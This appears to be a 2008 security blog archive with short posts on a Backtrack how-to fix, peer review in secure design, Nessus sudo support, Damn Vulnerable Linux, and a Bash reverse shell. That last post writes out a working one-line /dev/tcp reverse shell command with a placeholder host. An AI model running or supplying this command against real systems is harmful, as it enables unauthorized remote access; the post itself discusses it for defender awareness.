Backtrack 3 How-to updated…

September 16, 2008

Well folks, I made a rather stupid mistake in my Backtrack 3 how-to.  Instead of writing “>>” to append information to a file, I wrote “>” which overwrites the file.

Bad things happen when you overwrite the /etc/ld.so.conf file.

Thank you very much to David who left a comment pointing out my mistake.  The how-to has been updated.

Kevin


Secure system design that is impossible to break…

September 16, 2008

I just finished reading Cory Doctorow’s Little Brother. You can buy a copy here or read it for free here. Don’t let its classification as young adult deter you.  I really enjoyed it. If you are interested in privacy and government and how “it’s for your own good” can escalate out of control, I highly recommend giving it a gander.

In the book, there is a terrorist attack on San Francisco which results in draconian security measures being put in place. Our protagonist is Marcus, a 17 year old, who gets picked up by those enforcing the new security measures and is sorely mistreated.  Through the book, we follow Marcus as he fights for his rights and the rights of his friends as citizens using every means at his disposal, most of them being technical in nature.  He is able to circumvent many of the controls put in place because he is a savvy, technically astute individual who has the security mindset we talk about frequently and is in many cases smarter than those who designed the systems he fights against.

So what does all this have to do with a secure system design that is impossible to break? Well, first of all, it is impossible to design a secure system that is impossible to break :) Further, as Bruce Schneier says in the afterword:

“Anyone can design a security system so strong he himself can’t break it.”

We see this same type of phenomenon in other areas. For me, it’s proof reading.  I have the hardest time proof reading my own writing because I know what it is supposed to say. My own brain gets in my way and I read text as I intended it to be as opposed to how I actually wrote it.

If we can’t design perfect systems and we are not able to sufficiently test our systems ourselves, how can we improve those designs to make them more robust and harder to break?

There are a lot of things we can do like build on the successes of other, use “best practices”, etc.  However, I can think of a couple things that can significantly improve our efforts:

  1. Peer review – We should have our peers look at our designs.  They will see things that we are blind to.
  2. Testing by a third party – Yes, I am promoting third party testing of our systems, preferably by more than one person. Again, the more eyes involved in reviewing a system, the better chance that weaknesses will be found. I am not proposing that every system get a third party review. It would be prohibitively expensive.  However, important ones probably should.

This also started me thinking about our risk assessment processes and procedures.  If we develop our risk assessment processes internally, aren’t we, in the context of the assertions above, creating a system that is destined to have built-in short comings?  Should we have our risk assessment processes “tested?”

I’m interested in your thoughts on both topics, so drop me a note in the comments.

Kevin

Technorati Tags: ,


Hey Nessus, do you do sudo?

May 16, 2008

We all know and love Nessus. Well today, Tenable made it even better. Nessus now fully supports su and sudo for audit and patch compliance checks. This is very cool.

Next, in response to the ssh key bruhaha this week, there are now a couple of plugins that will check for weak keys in SSH and SSL protected webservers.

Caveat: It appears that you need to be Direct Feed/Professional subscriber to use these features.

Kevin


Bash based reverse shell wickedness

April 17, 2008

Shell

Neohapsis just created a lot of pain for those who are trying to stop folks who able to execute arbitrary code on a host, but unable to get a reverse shell.  Used to be you could remove netcat, wget, ftp, etc… and make it much more difficult for a reverse shell to be started.  Enter the ever friendly and helpful Bash shell.

All you need is:

$ exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0

and tadaa, reverse shell.

Go check it out – http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/

Kevin Riggins


D**m Vulnerable Linux – excellent pen/web app test learning tool

March 28, 2008

You may all be aware of this, but I was not. Last night I was looking for a LiveCD to use for testing some web app testing tools against. A couple of fine folks, Craig and Wesley suggested I check Damn Vulnerable Linux. So I did.

After a couple hours of download time, the thing is 1.5 GBs, I fired up a virtual machine, booted the iso, started apache and began poking about. They have put together a fine set of vulnerable applications and web pages that are very useful for both learning about pen/web security testing and testing new tools you might come across. The testing part is good for keeping the intarweb police jackboots off you neck :)

Check it out.

-Kevin


Follow

Get every new post delivered to your Inbox.